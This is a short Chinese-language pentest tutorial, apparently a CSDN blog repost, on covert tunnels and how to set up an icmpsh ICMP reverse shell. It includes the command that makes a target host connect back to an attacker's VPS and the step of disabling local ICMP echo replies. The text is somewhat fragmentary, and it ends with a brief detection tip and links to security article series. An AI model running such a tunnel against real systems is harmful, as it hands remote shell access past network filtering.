hidden:是否完全隐藏控制面板,还有很多设置参数,比如也可以设置显示面板,然后设置宽高WIDTH=“整数” 和 HIGH=“整数”。
1. 隐藏通信隧道基础1.1隐藏通信隧道技术概述1,ICMP协议、
执行命令 "ping “
nc
3,HTTP协议
curl是利用URL规则在命令行下工作的综合传输工具,
支持文件下载和上传 ,在windows系统中需要安装
命令:curl
链接:https://pan.baidu.com/s/1uBF8eDXI9nBJXB2tbqikpQ
提取码:zyx1
安装python的impacket类库 以便对TCP,UDP,ICMP,IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerbers,WML,LDAP等协议进行访问,
安装python-impacket
apt-get install python-impacket
因为icmpsh工具会替代系统本身的ping命令的应答程序,需要关闭本地系统的ICMP应答(如果要恢复系统应答,则设置为0),否则shell的运行会不稳定(表现为一直刷屏,无法进入交互输入)。
sysctl -w net.ipv4.icmp_echo_ignore_all=1
输入 ./run.sh
并运行,会提示出现输入目标的IP地址(目标主机的公网IP地址)
在目标主机上查看ip地址,输入如下命令:
icmpsh.exe -t 192.168.227.137(攻击机ip) -d 30 -s 128
在目标主机运行以上命令,即可在VPS中看到 192.168.227.133得shell。
网络管理员会阻止ICMP通信进入站点,在出站方向 ICMP通信是被允许的,目前大多数的网络和边界设备不会过滤ICMP流量
使用ICMP隧道时会产生大量的ICMP数据包,可以通过wireshark进行ICMP数据包分析,已检测恶意ICMP流量
版权声明:本文为CSDN博主「Kris Alex」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/Kris__zhang/article/details/106743675
【好书推荐】
2020hw系列文章整理(中秋快乐、国庆快乐、双节快乐)
HW中如何检测和阻止DNS隧道
ctf系列文章整理
日志安全系列-安全日志
【干货】流量分析系列文章整理
【干货】超全的 渗透测试系列文章整理
【干货】持续性更新-内网渗透测试系列文章
【干货】android安全系列文章整理
扫描关注LemonSec